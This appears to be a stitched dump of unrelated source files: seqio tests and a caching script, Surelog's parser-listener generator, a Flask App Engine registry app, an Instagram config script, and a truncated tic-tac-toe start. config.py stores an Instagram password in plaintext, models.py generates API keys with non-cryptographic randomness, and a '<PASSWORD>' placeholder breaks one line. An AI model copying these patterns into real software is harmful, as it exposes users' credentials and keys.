# Trim to sequence lengths (but with targets=None).
sequence_length['targets'] = None
assert_dataset(
preprocessors.append_eos_after_trim(
og_dataset,
output_features=output_features,
sequence_length=sequence_length), {
'inputs': [1, 2, 3],
'targets': [4, 5, 6, 7, 1],
'arrows': [8, 9, 10, 11, 1],
'strings': [[14, 15, 1], [16, 17, 1], [18, 19, 1]],
'feathers': [[20, 21, 1], [1], [22, 23, 24, 1]],
'bows': [12, 13],
})
# Don't trim to sequence lengths.
assert_dataset(
preprocessors.append_eos_after_trim(
og_dataset, output_features=output_features), {
'inputs': [1, 2, 3],
'targets': [4, 5, 6, 7, 1],
'arrows': [8, 9, 10, 11, 1],
'strings': [[14, 15, 1], [16, 17, 1], [18, 19, 1]],
'feathers': [[20, 21, 1], [1], [22, 23, 24, 25, 26, 1]],
'bows': [12, 13],
})
def test_append_to_innermost_axis(self):
test_cases = [
([1, 2, 3], -1, [1, 2, 3, -1]),
([[1, 2], [3, 4]], -1, [[1, 2, -1], [3, 4, -1]]),
(tf.ragged.constant([[1, 2], [3]]), -1, [[1, 2, -1], [3, -1]]),
(tf.ragged.constant([[[1, 2], [3]], [[4, 5, 6]]]), -1,
[[[1, 2, -1], [3, -1]], [[4, 5, 6, -1]]]),
(tf.ragged.constant([[[1, 2], [3, 4]], [[5, 6]]], ragged_rank=1), -1,
[[[1, 2, -1], [3, 4, -1]], [[5, 6, -1]]]),
]
for (tensor, scalar, expected) in test_cases:
with self.subTest(f'({tensor}, {scalar}) -> {expected}'):
actual = preprocessors._append_to_innermost_axis(tensor, scalar)
self.assertAllEqual(actual, expected)
def test_rekey(self):
og_dataset = tf.data.Dataset.from_tensors({
'text': 'That is good.', 'other': 'That is bad.'})
dataset = preprocessors.rekey(
og_dataset, {'inputs': 'other', 'targets': 'text'})
assert_dataset(
dataset,
{'inputs': 'That is bad.', 'targets': 'That is good.'})
dataset = preprocessors.rekey(og_dataset, {'targets': 'text'})
assert_dataset(dataset, {'targets': 'That is good.'})
dataset = preprocessors.rekey(og_dataset, {'inputs': 'text'})
assert_dataset(dataset, {'inputs': 'That is good.'})
dataset = preprocessors.rekey(og_dataset)
assert_dataset(dataset, {'text': 'That is good.', 'other': 'That is bad.'})
dataset = preprocessors.rekey(
og_dataset, {'inputs': 'text', 'targets': None})
assert_dataset(dataset, {'inputs': 'That is good.', 'targets': ''})
if __name__ == '__main__':
absltest.main()
```
#### File: seqio/scripts/cache_tasks_main.py
```python
r"""Dumps preprocessed tasks as TFRecord of tf.Examples.
Usage:
====================
seqio_cache_tasks \
--tasks=my_task_*,your_task \
--excluded_tasks=my_task_5 \
--output_cache_dir=/path/to/cache_dir \
--module_import=my.tasks \
--alsologtostderr
"""
import importlib
import os
import re
from absl import app
from absl import flags
from absl import logging
import apache_beam as beam
import seqio
from seqio import beam_utils
import tensorflow.compat.v2 as tf
# Significantly speeds up preprocessing in tf1.
tf.compat.v1.enable_eager_execution()
FLAGS = flags.FLAGS
flags.DEFINE_list(
"tasks", None,
"Regexes matching task(s) to build a preprocessed dataset for. Will build "
"all registered if not specified.")
flags.DEFINE_list(
"excluded_tasks", None,
"Regexes matching task(s) to skip.")
flags.DEFINE_string(
"output_cache_dir", None,
"The directory to output cached tasks to.")
flags.DEFINE_list(
"tasks_additional_cache_dirs", [],
"Additional directories to search for cached Tasks after checking the "
"global caches and `output_cache_dir`.")
flags.DEFINE_multi_string(
"module_import", [],
"Modules to import. Use this, for example, to add new `Task`s to the "
"global `TaskRegistry`.")
flags.DEFINE_list(
"pipeline_options", ["--runner=DirectRunner"],
"A comma-separated list of command line arguments to be used as options "
"for the Beam Pipeline.")
flags.DEFINE_boolean(
"overwrite", False,
"If true, overwrite the cached task even if it exists in the cached "
"directories.")
flags.DEFINE_integer(
"min_shards", 64,
"The minimum number of output shards to produce. Higher is better for "
"improved online data shuffling during training.")
def _import_modules(modules):
for module in modules:
if module:
importlib.import_module(module)
def run_pipeline(pipeline,
task_names,
cache_dir,
excluded_tasks=None,
modules_to_import=(),
overwrite=False,
completed_file_contents=""):
"""Run preprocess pipeline."""
output_dirs = []
# Includes all names by default.
included_regex = re.compile(r"(%s\Z)" % r"\Z|".join(task_names or [".*"]))
# Excludes only empty names by default.
excluded_regex = re.compile(r"(%s\Z)" % r"\Z|".join(excluded_tasks or []))
task_names = [
t for t in seqio.TaskRegistry.names()
if included_regex.match(t) and not excluded_regex.match(t)]
if not task_names:
logging.warning("No tasks have been selected from the task registry. "
"Please make sure that the tasks you want cached exist in "
"the task registry and haven't been excluded by the "
"--excluded_tasks flag.")
for task_name in task_names:
task = seqio.TaskRegistry.get(task_name)
if not task.supports_caching:
logging.info(
"Skipping task that does not support caching: '%s'", task.name)
continue
task_cache_dir = task.cache_dir
output_dir = os.path.join(
cache_dir, seqio.get_task_dir_from_name(task.name))
if task_cache_dir and not overwrite:
logging.info("Skipping task '%s', which exists in cache dir: %s",
task.name, task_cache_dir)
continue
if task_cache_dir and overwrite:
if task_cache_dir == output_dir:
        # We were asked to overwrite the data and the output directory already
        # contains it, so delete the existing copy before regenerating it.
logging.warning(
"Overwriting already cached data for task '%s' in cache_dir %s",
task.name, output_dir)
tf.io.gfile.rmtree(output_dir)
else:
# Cannot overwrite, since cache_dir isn't same as task.cache_dir.
logging.warning("Not overwriting data in task.cache_dir since it is "
"different from cache_dir - %s vs %s", task.cache_dir,
output_dir)
continue
if not task.splits:
logging.warning("Skipping task '%s' with no splits.", task.name)
continue
# Log this task to the terminal.
print("Caching task '%s' with splits: %s" % (task.name, task.splits))
output_dirs.append(output_dir)
completion_values = []
if isinstance(task.source, seqio.FunctionDataSource):
logging.warning(
"Task '%s' using FunctionDataSource cannot be distributed. If your "
"dataset is large, you may be able to speed up preprocessing by "
"sharding it and using a TfdsSource, TFExampleSource, or "
"TextLineSource instead.", task.name)
for split in task.splits:
label = "%s_%s" % (task.name, split)
pat = beam_utils.PreprocessTask(
task, split, modules_to_import=modules_to_import)
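      # use the smaller of the input shard count and --min_shards as the
      # number of output shards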
num_shards = min(len(pat.shards), FLAGS.min_shards)
examples = pipeline | "%s_pat" % label >> pat
completion_values.append(
examples
| "%s_write_tfrecord" % label >> beam_utils.WriteExampleTfRecord(
seqio.get_cached_tfrecord_prefix(output_dir, split),
num_shards=num_shards))
completion_values.append(
examples
| "%s_info" % label >> beam_utils.GetInfo(num_shards)
| "%s_write_info" % label >> beam_utils.WriteJson(
seqio.get_cached_info_path(output_dir, split)))
completion_values.append(
examples
| "%s_stats" % label >> beam_utils.GetStats(task.output_features)
| "%s_write_stats" % label >> beam_utils.WriteJson(
seqio.get_cached_stats_path(output_dir, split)))
# After all splits for this task have completed, write COMPLETED files to
# the task's output directory.
_ = (completion_values
| "%s_flatten_completion_values" % task.name >> beam.Flatten()
| "%s_discard_completion_values" % task.name >> beam.Filter(
lambda _: False)
| "%s_write_completed_file" % task.name >> beam.io.textio.WriteToText(
os.path.join(output_dir, "COMPLETED"),
append_trailing_newlines=False, num_shards=1,
shard_name_template="", header=completed_file_contents))
return output_dirs
def main(_):
flags.mark_flags_as_required(["output_cache_dir"])
_import_modules(FLAGS.module_import)
seqio.add_global_cache_dirs(
[FLAGS.output_cache_dir] + FLAGS.tasks_additional_cache_dirs)
pipeline_options = beam.options.pipeline_options.PipelineOptions(
FLAGS.pipeline_options)
with beam.Pipeline(options=pipeline_options) as pipeline:
tf.io.gfile.makedirs(FLAGS.output_cache_dir)
unused_output_dirs = run_pipeline(
pipeline,
FLAGS.tasks,
FLAGS.output_cache_dir,
FLAGS.excluded_tasks,
FLAGS.module_import,
FLAGS.overwrite,
)
def console_entry_point():
app.run(main)
if __name__ == "__main__":
console_entry_point()
``` |
{
"source": "00mjk/Surelog",
"score": 2
} |
#### File: Surelog/scripts/generate_parser_listener.py
```python
import argparse
import os
import re
import sys
_this_filepath = os.path.realpath(__file__)
_default_workspace_dirpath = os.path.dirname(os.path.dirname(_this_filepath))
_type_names = set([
'slNoType',
'slComments',
'slModule',
# both Module_declaration and Interface_declaration enter and exit rules are in SV3_1aTreeShapeListener.cpp file
'slModule_declaration',
'slInterface_declaration',
# Class_type exit is in SV3_1aTreeShapeListener.cpp file
'slClass_type',
'slHierarchical_identifier',
'slModuleInstance',
'slPrimitive',
'slPrimitiveInstance',
'slInterface',
'slProgram',
'slPackage',
'slChecker',
'slClass',
'slPortInst',
'slConstSelect',
'slIntConst',
'slRealConst',
'slStringConst',
'slStringLiteral',
'slConstantSelect',
'slThis',
'slGenericElementType',
'sl0',
'sl1',
'slX',
'slZ',
'slNumber',
'slText_blob',
'slCR',
'slSpaces',
'slEscapedCR',
'slVirtual',
'slExtends',
'slImplements',
'slEndfunction',
'slEndmodule',
'slEndclass',
'slEndtask',
'slEndchecker',
'slEndinterface',
'slEndprogram',
'slEndpackage',
'slEndcase',
'slEndsequence',
'slEnd',
'slEndspecify',
'slEndconfig',
'slEndproperty',
'slEndgroup',
'slEndgenerate',
'slEndprimitive',
'slEndtable',
'slEndclocking',
'slUnique',
'slUnique0',
'slPriority',
'slCase',
'slCaseX',
'slCaseZ',
'slIncPartSelectOp',
'slDecPartSelectOp',
'slColumnPartSelectOp',
'slReturnStmt',
'slBreakStmt',
'slContinueStmt',
'slAssign',
'slDeassign',
'slForce',
'slRelease',
'slForever',
'slRepeat',
'slWhile',
'slFor',
'slDo',
'slForeach',
'slElse',
'slInterface_instantiation',
'slProgram_instantiation',
'slSupply0',
'slStrong0',
'slPull0',
'slWeak0',
'slSupply1',
'slStrong1',
'slPull1',
'slWeak1',
'slHighZ1',
'slHighZ0',
'slSmall',
'slMedium',
'slLarge',
'slDot',
'slDotStar',
'slNonBlockingTriggerEvent',
'slPound_Pound_delay',
'slPortDir_Inp',
'slPortDir_Out',
'slPortDir_Inout',
'slPortDir_Ref',
'slAlwaysKeywd_Always',
'slAlwaysKeywd_Comb',
'slAlwaysKeywd_Latch',
'slAlwaysKeywd_FF',
'slEdge_Posedge',
'slEdge_Negedge',
'slEdge_Edge',
'slNumber_Integral',
'slNumber_Real',
'slNumber_1Tickb0',
'slNumber_1Tickb1',
'slNumber_1TickB0',
'slNumber_1TickB1',
'slNumber_Tickb0',
'slNumber_Tickb1',
'slNumber_TickB0',
'slNumber_TickB1',
'slNumber_Tick0',
'slNumber_Tick1',
'slNumber_1Tickbx',
'slNumber_1TickbX',
'slNumber_1TickBx',
'slNumber_1TickBX',
'slSigning_Signed',
'slSigning_Unsigned',
'slTfPortDir_Inp',
'slTfPortDir_Out',
'slTfPortDir_Inout',
'slTfPortDir_Ref',
'slTfPortDir_ConstRef',
'slIntegerAtomType_Byte',
'slIntegerAtomType_Shortint',
'slIntegerAtomType_Int',
'slIntegerAtomType_LongInt',
'slIntegerAtomType_Int',
'slIntegerAtomType_Time',
'slIntVec_TypeBit',
'slIntVec_TypeLogic',
'slIntVec_TypeReg',
'slNonIntType_ShortReal',
'slNonIntType_Real',
'slNonIntType_RealTime',
'slUnary_Plus',
'slUnary_Minus',
'slUnary_Not',
'slUnary_Tilda',
'slUnary_BitwAnd',
'slUnary_BitwOr',
'slUnary_BitwXor',
'slUnary_ReductNand',
'slUnary_ReductNor',
'slUnary_ReductXnor1',
'slUnary_ReductXnor2',
'slBinOp_MultMult',
'slBinOp_Mult',
'slBinOp_Div',
'slBinOp_Percent',
'slBinOp_Plus',
'slBinOp_Minus',
'slBinOp_ShiftRight',
'slBinOp_ShiftLeft',
'slBinOp_ArithShiftRight',
'slBinOp_ArithShiftLeft',
'slBinOp_Less',
'slBinOp_LessEqual',
'slBinOp_Great',
'slBinOp_GreatEqual',
'slInsideOp',
'slBinOp_Equiv',
'slBinOp_Not',
'slBinOp_WildcardEqual',
'slBinOp_WildcardNotEqual',
'slBinOp_FourStateLogicEqual',
'slBinOp_FourStateLogicNotEqual',
'slBinOp_WildEqual',
'slBinOp_WildNotEqual',
'slBinOp_BitwAnd',
'slBinOp_ReductXnor1',
'slBinOp_ReductXnor2',
'slBinOp_ReductNand',
'slBinOp_ReductNor',
'slBinOp_BitwXor',
'slBinOp_BitwOr',
'slBinOp_LogicAnd',
'slBinOp_LogicOr',
'slBinOp_Imply',
'slBinOp_Equivalence',
'slIncDec_PlusPlus',
'slIncDec_MinusMinus',
'slTagged',
'slQmark',
'slMatches',
'slIff',
'slNull',
'slWith',
'slImport',
'slExport',
'slPure',
'slOpenParens',
'slCloseParens',
'slAssignOp_Assign',
'slAssignOp_Add',
'slAssignOp_Sub',
'slAssignOp_Mult',
'slAssignOp_Div',
'slAssignOp_Modulo',
'slAssignOp_BitwAnd',
'slAssignOp_BitwOr',
'slAssignOp_BitwXor',
'slAssignOp_BitwLeftShift',
'slAssignOp_BitwRightShift',
'slAssignOp_ArithShiftLeft',
'slAssignOp_ArithShiftRight',
'slIncDec_PlusPlus',
'slIncDec_MinusMinus',
'slNetType_Supply0',
'slNetType_Supply1',
'slNetType_Tri',
'slNetType_TriAnd',
'slNetType_TriOr',
'slNetType_TriReg',
'slNetType_Tri0',
'slNetType_Tri1',
'slNetType_Uwire',
'slNetType_Wire',
'slNetType_Wand',
'slNetType_Wor',
'slPulldown',
'slPullup',
'slWithin',
'slThroughout',
'slFirstMatch',
'slIntersect',
'slDefault',
'slGlobal',
# Properties
'slOR',
'slAND',
'slIF',
'slSTRONG',
'slWEAK',
'slNOT',
'slOVERLAP_IMPLY',
'slNON_OVERLAP_IMPLY',
'slOVERLAPPED',
'slNONOVERLAPPED',
'slS_NEXTTIME',
'slALWAYS',
'slS_ALWAYS',
'slS_EVENTUALLY',
'slEVENTUALLY',
'slUNTIL',
'slS_UNTIL',
'slUNTIL_WITH',
'slS_UNTIL_WITH',
'slIMPLIES',
'slIFF',
'slACCEPT_ON',
'slREJECT_ON',
'slSYNC_ACCEPT_ON',
'slSYNC_REJECT_ON',
'slType',
])
def _write_output(filename, content):
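    # write only when the content actually changed; an identical file is left
    # untouched and False is returned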
if os.path.exists(filename):
with open(filename, 'rt') as strm:
orig_content = strm.read()
if orig_content == content:
return False
dirpath = os.path.dirname(filename)
if not os.path.isdir(dirpath):
os.makedirs(dirpath)
with open(filename, 'wt') as strm:
strm.write(content)
strm.flush()
return True
def _get_implemented_methods(filepath):
parse_method_name_regex = re.compile('.+::(?P<method_name>(enter|exit|visit)\w+)\s*\(.*')
methods = set()
with open(filepath, 'rt') as strm:
for line in strm:
m = parse_method_name_regex.match(line)
if m:
methods.add(m.group('method_name'))
return methods
def _generate_header(listener, antlr_definition_filepath, cpp_input_filepath, output_header_filepath):
content = [
'// This file is auto-generated by generate_parser_listener.py',
'// DO NOT EDIT',
'',
'/*',
' Copyright 2019 <NAME>',
' Licensed under the Apache License, Version 2.0 (the \"License\");',
' you may not use this file except in compliance with the License.',
' You may obtain a copy of the License at',
'',
' http://www.apache.org/licenses/LICENSE-2.0',
'',
' Unless required by applicable law or agreed to in writing, software',
' distributed under the License is distributed on an \"AS IS\" BASIS,',
' WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.',
' See the License for the specific language governing permissions and',
' limitations under the License.',
' */',
'',
'/*',
f' * If a method needs custom operator, write the method in {os.path.basename(cpp_input_filepath)}',
' *',
f' * File: {os.path.basename(output_header_filepath)}',
' * Author: alain',
' *',
' * Created on April 16, 2017, 8:28 PM',
' */',
''
]
if listener == 'Parser':
content.extend([
'#ifndef SURELOG_SV3_1ATREESHAPELISTENER_H',
'#define SURELOG_SV3_1ATREESHAPELISTENER_H',
'#pragma once',
'',
'',
'#include <stack>',
'#include <map>',
'#include <unordered_map>',
'',
'#include "Surelog/Utils/ParseUtils.h"',
'#include "Surelog/SourceCompile/SymbolTable.h"',
'#include "Surelog/Design/TimeInfo.h"',
'#include "Surelog/Design/DesignElement.h"',
'#include "Surelog/Design/FileContent.h"',
'#include "Surelog/SourceCompile/ParseFile.h"',
'#include "Surelog/SourceCompile/CompilationUnit.h"',
'#include "Surelog/SourceCompile/CompileSourceFile.h"',
'#include "Surelog/SourceCompile/SV3_1aTreeShapeHelper.h"',
'#include "parser/SV3_1aParserBaseListener.h"',
'',
'namespace SURELOG {',
'',
' class SV3_1aTreeShapeListener : public SV3_1aParserBaseListener, public SV3_1aTreeShapeHelper {',
' private:',
'',
' public:',
' SV3_1aTreeShapeListener(ParseFile* pf, antlr4::CommonTokenStream* tokens, unsigned int lineOffset);',
' virtual ~SV3_1aTreeShapeListener() override;',
''
])
else:
content.extend([
'#ifndef SURELOG_SV3_1APPTREESHAPELISTENER_H',
'#define SURELOG_SV3_1APPTREESHAPELISTENER_H',
'#pragma once',
'',
'',
'#include <regex>',
'',
'#include "Surelog/SourceCompile/PreprocessFile.h"',
'#include "Surelog/SourceCompile/CompileSourceFile.h"',
'#include "Surelog/SourceCompile/Compiler.h"',
'#include "Surelog/SourceCompile/SymbolTable.h"',
'#include "Surelog/SourceCompile/CompilationUnit.h"',
'#include "Surelog/Design/TimeInfo.h"',
'#include "Surelog/SourceCompile/SV3_1aPpTreeListenerHelper.h"',
'#include "parser/SV3_1aPpParserBaseListener.h"',
'',
'namespace SURELOG {',
'',
' class SV3_1aPpTreeShapeListener : public SV3_1aPpParserBaseListener , public SV3_1aPpTreeListenerHelper {',
'',
' public:',
' SV3_1aPpTreeShapeListener(PreprocessFile* pp, antlr4::CommonTokenStream* tokens, PreprocessFile::SpecialInstructions& instructions);',
''
])
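    # parse_method_name_regex matches the virtual enter/exit/visit callback
    # declarations of the ANTLR-generated base listener; sub_regex1 rewrites
    # their empty default bodies into overrides, and sub_regex2 un-comments the
    # ctx parameter name so it can be used in the generated body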
parse_method_name_regex = re.compile('\s*virtual\s+void\s+(?P<method_name>(enter|exit|visit)\w+)\s*\(.*')
sub_regex1 = re.compile('\s*virtual\s+(?P<declaration>void\s+(?P<method>(enter|exit|visit)\w+).+)\s+override\s+\{\s+\}')
sub_regex2 = re.compile('(.+)(/\*ctx\*/)(.+)')
implemented_methods = _get_implemented_methods(cpp_input_filepath)
with open(antlr_definition_filepath, 'rt') as strm:
for line in strm:
line = line.strip()
if line:
m = parse_method_name_regex.match(line)
if m:
method_name = m.group('method_name')
if 'ErrorNode' in method_name:
abc = 0
if method_name.startswith('exit'):
type_name = method_name.replace('enter', '').replace('exit', '').replace('visit', '')
_type_names.add(f'sl{type_name}')
if method_name in implemented_methods:
line = sub_regex1.sub(' \g<declaration> final;', line)
elif method_name.startswith('exit'):
method_name = method_name.replace('exit', '')
line = sub_regex1.sub(f'\g<declaration> final {{ addVObject(ctx, VObjectType::sl{method_name}); }}', line)
line = sub_regex2.sub(' \g<1>ctx\g<3>', line)
else:
line = sub_regex1.sub(' \g<declaration> final {}', line)
content.append(line)
content.extend([
' };',
'} // namespace SURELOG',
''
])
if listener == 'Parser':
content.append('#endif // SURELOG_SV3_1ATREESHAPELISTENER_H')
else:
content.append('#endif // SURELOG_SV3_1APPTREESHAPELISTENER_H')
_write_output(output_header_filepath, '\n'.join(content))
def _generate_VObjectTypes_h(filepath):
content = [
'// This file is auto-generated by generate_parser_listener.py',
'// DO NOT EDIT',
'',
'#ifndef SURELOG_VOBJECTTYPES_H',
'#define SURELOG_VOBJECTTYPES_H',
'#pragma once',
'',
'',
'enum VObjectType {',
]
index = 0
for type_name in sorted(_type_names, key=lambda s: s.lower()):
content.append(f' {type_name} = {index},')
index += 1
content.extend([
'};',
'',
'#endif // SURELOG_VOBJECTTYPES_H',
''
])
_write_output(filepath, '\n'.join(content))
def _generate_VObjectTypes_cpp(filepath):
content = [
'// This file is auto-generated by generate_parser_listener.py',
'// DO NOT EDIT',
'',
'#include <string>',
'#include "Surelog/Design/VObject.h"',
'',
'',
'using namespace SURELOG;',
'',
'std::string VObject::getTypeName(unsigned short type) {',
' switch (type) {',
]
content.extend([f' case {type_name}: return "{type_name}";' for type_name in sorted(_type_names, key=lambda s: s.lower())])
content.extend([
' default: return "";',
' }',
'}',
''
])
_write_output(filepath, '\n'.join(content))
def _generate_VObjectTypes_py_h(filepath):
content = [
'// This file is auto-generated by generate_parser_listener.py',
'// DO NOT EDIT',
'',
'#ifndef SURELOG_VOBJECTTYPES_PY_H',
'#define SURELOG_VOBJECTTYPES_PY_H',
'#pragma once',
'',
'',
'#include <vector>',
'#include <string_view>',
'',
'std::vector<std::string_view> slapi_types = {',
' "# This file is automatically generated by generate_parser_listener.py\\n",',
' "# DO NOT EDIT\\n",',
]
index = 0
for type_name in sorted(_type_names, key=lambda s: s.lower()):
content.append(f' "{type_name} = {index};\\n",')
index += 1
content.extend([
'};',
'',
'#endif // SURELOG_VOBJECTTYPES_PY_H',
''
])
_write_output(filepath, '\n'.join(content))
def _main():
parser = argparse.ArgumentParser()
parser.add_argument(
'--workspace-dirpath', dest='workspace_dirpath', required=False, default=_default_workspace_dirpath, type=str,
help='Workspace root, either absolute or relative to current working directory.')
parser.add_argument(
'--output-dirpath', dest='output_dirpath', required=True, type=str,
help='Output directory path, either absolute or relative to the workspace directory.')
args = parser.parse_args()
if not os.path.isabs(args.workspace_dirpath):
args.workspace_dirpath = os.path.abspath(args.workspace_dirpath)
if not os.path.isabs(args.output_dirpath):
args.output_dirpath = os.path.join(args.workspace_dirpath, args.output_dirpath)
args.output_dirpath = os.path.abspath(args.output_dirpath)
_generate_header(
'Parser',
os.path.join(args.output_dirpath, 'src', 'parser', 'SV3_1aParserBaseListener.h'),
os.path.join(args.workspace_dirpath, 'src', 'SourceCompile', 'SV3_1aTreeShapeListener.cpp'),
os.path.join(args.output_dirpath, 'include', 'Surelog', 'SourceCompile', 'SV3_1aTreeShapeListener.h'))
_generate_header(
'PreProc',
os.path.join(args.output_dirpath, 'src', 'parser', 'SV3_1aPpParserBaseListener.h'),
os.path.join(args.workspace_dirpath, 'src', 'SourceCompile', 'SV3_1aPpTreeShapeListener.cpp'),
os.path.join(args.output_dirpath, 'include', 'Surelog', 'SourceCompile', 'SV3_1aPpTreeShapeListener.h'))
_generate_VObjectTypes_h(os.path.join(args.output_dirpath, 'include', 'Surelog', 'SourceCompile', 'VObjectTypes.h'))
_generate_VObjectTypes_cpp(os.path.join(args.output_dirpath, 'src', 'SourceCompile', 'VObjectTypes.cpp'))
_generate_VObjectTypes_py_h(os.path.join(args.output_dirpath, 'include', 'Surelog', 'API', 'VObjectTypes_py.h'))
return 0
if __name__ == '__main__':
sys.exit(_main())
``` |
{
"source": "00-MSME/a00_registry",
"score": 3
} |
#### File: a00_registry/src/main.py
```python
import logging
from google.appengine.api import users
from flask import Flask, redirect, flash
from constants import *
app = Flask(__name__)
app.secret_key = FLASK_SECRET_KEY
from shared import render_login_template, with_person
from models import Person
@app.route('/', methods=["GET"])
def home():
google_user = users.get_current_user()
if google_user is not None:
google_id = google_user.user_id()
person = Person.with_google_id(google_id)
if person is not None:
return render_login_template("account.html", person=person)
else:
flash("choose a name and email to use with your augment00 account", "info")
return redirect("/person/new")
else:
return render_login_template("intro.html")
@app.route('/about', methods=["GET"])
def about():
google_user = users.get_current_user()
if google_user is not None:
google_id = google_user.user_id()
person = Person.with_google_id(google_id)
else:
person = None
return render_login_template("about.html", person=person)
@app.errorhandler(500)
def server_error(e):
# Log the error and stacktrace.
logging.exception('An error occurred during a request.')
return 'An internal error occurred.', 500
```
#### File: a00_registry/src/models.py
```python
import random
import uuid
from Crypto.PublicKey import RSA
from google.appengine.ext import ndb
from google.appengine.api import users
from base64 import b64encode, b64decode
from jinja2 import Template
from utilities import firebase, keys
from augment_exceptions import NonUniqueException
from constants import *
ALPHA_NUMERIC = "abcdefghijklmnopqrstuvwxyz0123456789"
def generateNewRandomAlphaNumeric(length):
random.seed()
values = []
for i in range(length):
values.append(random.choice(ALPHA_NUMERIC))
return "".join(values)
class Name(ndb.Model):
pass
class Email(ndb.Model):
pass
class GoogleId(ndb.Model):
pass
class Person(ndb.Model):
name_key = ndb.KeyProperty(kind="Name", required=True)
email_key = ndb.KeyProperty(kind="Email", required=True)
google_id_key = ndb.KeyProperty(kind="GoogleId")
api_key = ndb.StringProperty()
@classmethod
def create(cls, name, email, google_id):
name_key = cls._new_unique_key(Name, name)
email_key = cls._new_unique_key(Email, email)
google_id_key = cls._new_unique_key(GoogleId, google_id)
person_uuid = str(uuid.uuid4())
api_key = generateNewRandomAlphaNumeric(30)
person = cls(name_key=name_key,
email_key=email_key,
google_id_key=google_id_key,
id=person_uuid,
api_key=api_key)
person.put()
return person
def get_name(self):
return self.name_key.id()
def set_name(self, new_name):
self._set_unique_attribute(Name, "name_key", new_name)
def get_email(self):
return self.email_key.id()
def set_email(self, new_email):
self._set_unique_attribute(Email, "email_key", new_email)
def get_google_id(self):
return self.google_id_key.id()
@classmethod
def with_email(cls, email):
key = ndb.Key(Email, email)
return cls.query(cls.email_key == key).get()
@classmethod
def with_name(cls, name):
key = ndb.Key(Name, name)
return cls.query(cls.name_key == key).get()
@classmethod
def with_google_id(cls, google_id):
key = ndb.Key(GoogleId, google_id)
return cls.query(cls.google_id_key == key).get()
@staticmethod
def _new_unique_key(attribute_class, new_value):
new_attribute_key = ndb.Key(attribute_class, new_value)
existing_attribute_obj = new_attribute_key.get()
if existing_attribute_obj is not None:
            raise NonUniqueException("The value %s for %s is already in use" % (new_value, attribute_class))
else:
new_attribute_obj = attribute_class(key=new_attribute_key)
new_attribute_obj.put()
return new_attribute_key
@ndb.transactional(xg=True)
def _set_unique_attribute(self, attribute_class, attribute_key_name, new_value):
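        # uniqueness is enforced by keying a small entity on the value itself:
        # creating the new key fails if the value is already taken, and the old
        # key is deleted so the previous value becomes available again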
current_attribute_key = getattr(self, attribute_key_name)
current_value = current_attribute_key.id()
if current_value == new_value:
return
new_attribute_key = self._new_unique_key(attribute_class, new_value)
current_attribute_key.delete()
setattr(self, attribute_key_name, new_attribute_key)
self.put()
def add_new_entity(self, **kwargs):
return Entity.create(self.key, **kwargs)
@property
def entities(self):
return [e for e in Entity.query(Entity.person_key == self.key).iter()]
@property
def configs(self):
return [c for c in ConfigFile.query(ancestor=self.key).iter()]
def remove(self):
ndb.delete_multi(ConfigFile.query(ancestor=self.key).iter(keys_only=True))
ndb.delete_multi(Entity.query(Entity.person_key == self.key).iter(keys_only=True))
self.name_key.delete()
self.email_key.delete()
self.google_id_key.delete()
self.key.delete()
def reset_api_key(self):
self.api_key = generateNewRandomAlphaNumeric(30)
self.put()
def add_config_file(self, name, text, path):
config_uuid = str(uuid.uuid4())
config_file = ConfigFile(id=config_uuid,
parent=self.key,
name=name,
text=text,
path=path)
config_file.put()
return config_file
name = property(get_name, set_name)
email = property(get_email, set_email)
google_id = property(get_google_id)
class ConfigFile(ndb.Model):
name = ndb.StringProperty()
text = ndb.TextProperty()
path = ndb.StringProperty()
def as_json(self, entity):
entity_uuid = entity.key.id()
template_values = entity.template_values
template = Template(self.text)
return {
"text": template.render(uuid=entity_uuid, **template_values),
"path": self.path
}
class Entity(ndb.Model):
name = ndb.StringProperty()
description = ndb.TextProperty()
created = ndb.DateTimeProperty(auto_now_add=True)
person_key = ndb.KeyProperty(kind="Person", required=True)
public_key = ndb.TextProperty()
private_key = ndb.TextProperty()
serial = ndb.StringProperty()
config = ndb.KeyProperty(ConfigFile, repeated=True)
template_values = ndb.JsonProperty(default={})
schema = ndb.JsonProperty(default={})
def as_json(self):
entity_uuid = self.key.id()
return {
"name": self.name,
"description": self.description,
"created": str(self.created),
"person_key": self.person_key.id(),
"public_key": self.public_key,
"config": [c.get().as_json(self) for c in self.config]
}
@property
def config_files(self):
configs = [c.get() for c in self.config]
return configs
def add_config_file(self, config_file):
key = config_file.key
if not key in self.config:
self.config.append(key)
self.put()
def remove_config_file(self, config_file):
key = config_file.key
if key in self.config:
self.config.remove(key)
self.put()
def regenerate_keys(self):
public, private = keys.newkeys(2048)
self.private_key = private.exportKey('PEM')
self.public_key = public.exportKey('PEM')
self.put()
return self.private_key
@classmethod
def create(cls, person_key, **kwargs):
public, private = keys.newkeys(2048)
private_key = private.exportKey('PEM')
public_key = public.exportKey('PEM')
entity_uuid = str(uuid.uuid4())
entity = cls(id=entity_uuid,
person_key=person_key,
public_key=public_key,
private_key=private_key,
**kwargs)
entity.put()
return entity
```
#### File: a00_registry/src/shared.py
```python
from functools import wraps
from flask import Flask, render_template, redirect, request
from google.appengine.api import users
from models import Person
def render_login_template(template, **kwargs):
user = users.get_current_user()
if user:
login_url = users.create_logout_url(request.url)
url_linktext = 'logout'
else:
login_url = users.create_login_url(request.url)
url_linktext = 'login'
return render_template(template, login_url=login_url, url_linktext=url_linktext, **kwargs)
def with_person(func):
@wraps(func)
def decorated_view(*args, **kwargs):
google_user = users.get_current_user()
if google_user is not None:
google_id = google_user.user_id()
person = Person.with_google_id(google_id)
if person is None:
return redirect("/")
else:
return func(*args, person=person, **kwargs)
else:
raise Exception("no google user in new_person")
return decorated_view
``` |
{
"source": "00NoisyMime00/Instagram-Followers-Analyser",
"score": 3
} |
#### File: 00NoisyMime00/Instagram-Followers-Analyser/config.py
```python
from getpass import getpass
import json
import os.path
from os import path
if not path.exists('user.json'):
with open('user.json', 'w') as f:
details = {}
details['id'] = ""
details['password'] = ""
json.dump(details, f)
with open('user.json', 'r') as f:
details = json.loads(f.read())
id = details['id']
password = details['password']
def change():
    id = input('Enter your Instagram handle : ')
password = <PASSWORD>()
details={}
details['id'] = id
details['password'] = password
with open('user.json', 'w') as f:
json.dump(details, f)
with open('followersList.json', 'w') as f:
json.dump([], f)
``` |
{
"source": "00NoisyMime00/Tick-Tac-Toe",
"score": 4
} |
#### File: 00NoisyMime00/Tick-Tac-Toe/Tic-Tac-Toe.py
```python
import os
winner = -1
c=0
s='1 2 3 4 5 6 7 8 9 '
def printboard(n):
'''
The function prints the board, and also the user who has the next turn.
    A symbol is added by locating the chosen number in the string 's' and
